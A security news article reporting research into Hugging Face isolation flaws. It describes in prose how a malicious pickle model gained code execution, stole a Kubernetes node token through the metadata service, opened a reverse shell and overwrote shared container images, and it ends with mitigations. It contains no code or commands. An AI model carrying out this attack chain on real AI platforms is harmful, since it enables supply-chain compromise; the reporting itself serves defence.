Cyber AI

New AI-as-a-Service Flaw Enables Hackers to Escalate Privileges

by
Free RDP
December 22, 2025

Hugging Face has become the go‑to hub for training, storing, and sharing machine‑learning models. It lets developers experiment with ready‑made models and datasets without the overhead of local installations. The platform’s popularity means it sits at the heart of the AI supply chain, a fact that makes it a prime target for adversaries.

The Anatomy of an AI‑as‑a‑Service Attack

At its core, an AI application is a trio of components: the model, the application code that drives it, and the inference infrastructure that runs the model. Each of these layers can be a vector for attack. Adversarial inputs can warp a model’s behavior, insecure code can produce wrong predictions, and malicious models can slip through into production environments.

How Attackers Slip In

Researchers discovered that malicious actors can exploit flaws in the inference process, specifically by loading untrusted pickle files. Pickle, a Python serialization format, is notorious for enabling remote code execution when an attacker controls the payload. By uploading a crafted pickle model, an attacker can trigger arbitrary code execution inside the inference environment.

Supply‑Chain Risk Amplified by CI/CD

Once a malicious model is in place, the danger extends beyond the inference sandbox. Attackers can inject harmful code into the continuous integration and continuous deployment pipeline that feeds AI applications. This creates a supply‑chain attack that compromises not only the target model but potentially every downstream application that relies on shared resources.

Researchers Uncover Isolation Flaws

Wiz, a security firm focused on cloud infrastructure, conducted a deep dive into Hugging Face’s isolation mechanisms. They tested three flagship offerings: the Inference API, which allows experimentation without local setups; Inference Endpoints, a managed production deployment service; and Spaces, a collaborative app hosting platform.

Custom Model Uploads: A Double‑Edged Sword

All three services let users upload custom models. While this flexibility is a boon for developers, it also opens the door for attackers. The team wondered: could a malicious model be uploaded and executed within the Inference API, thereby compromising the underlying infrastructure?

The Pickle Test

To answer that, they crafted a malicious PyTorch model serialized in pickle format. Hugging Face scans uploaded pickle files for known malware signatures, yet it still permits inference on flagged models due to community usage policies. The researchers uploaded their test model and observed that the Inference API executed the embedded code. The execution environment was not fully sandboxed, meaning the code ran with the same privileges as the inference process.

From Model to Kubernetes: A Stealthy Path

Exploiting the RCE in the Inference API gave attackers a foothold inside a Kubernetes pod on Amazon EKS. By abusing the pod’s ability to query the instance metadata service (IMDS) and a default insecure configuration that exposes node identity, the attacker retrieved a bearer token with node‑level privileges.

Gaining a Reverse Shell

Armed with the token, the attacker launched a reverse shell from the inference environment, effectively bridging the gap between the model’s sandbox and the cluster’s control plane. This shell allowed enumeration of pod information and extraction of secrets stored in environment variables or mounted volumes.

Lateral Movement and Container Registry Compromise

With node privileges in hand, the attacker moved laterally within the cluster and took advantage of a vulnerability in Hugging Face Spaces. They crafted a malicious Dockerfile that executed harmful commands during the image build process. The compromised image was pushed to a user‑shared internal container registry. Because access controls were insufficient, the attacker could overwrite other users’ container images, potentially sabotaging production deployments.

Mitigating the Threat

Security teams should treat model ingestion as an entry point for threat actors. Implementing strict content validation, such as rejecting pickle formats or sandboxing them in a dedicated runtime, can stop malicious payloads from reaching the inference engine. Additionally, tightening IAM roles so that pods cannot query IMDS unless absolutely necessary will reduce the risk of token theft.

Hardening the Supply Chain

Automated scanning of Dockerfiles and image layers for suspicious commands should become a standard step before pushing to a registry. Coupled with immutable deployment practices and fine‑grained access controls, these measures can prevent attackers from tampering with downstream applications.

What This Means for the AI Supply Chain

The findings highlight a broader issue: the convenience of AI‑as‑a‑service platforms can inadvertently lower security baselines. As more organizations rely on shared compute resources, the potential impact of a single compromised model magnifies. The attack surface now extends from the model layer to the orchestration layer and beyond.

Looking Ahead

Future AI platforms must embed security into every layer of the stack, from model validation to infrastructure isolation. By treating every uploaded artifact as a potential threat and enforcing least‑privilege principles at the container and cluster levels, developers can harness the power of shared AI services without exposing themselves to the kind of privilege escalation demonstrated in recent research. The next wave of AI deployment will be defined not just by model accuracy but by the robustness of the security controls that protect the entire supply chain.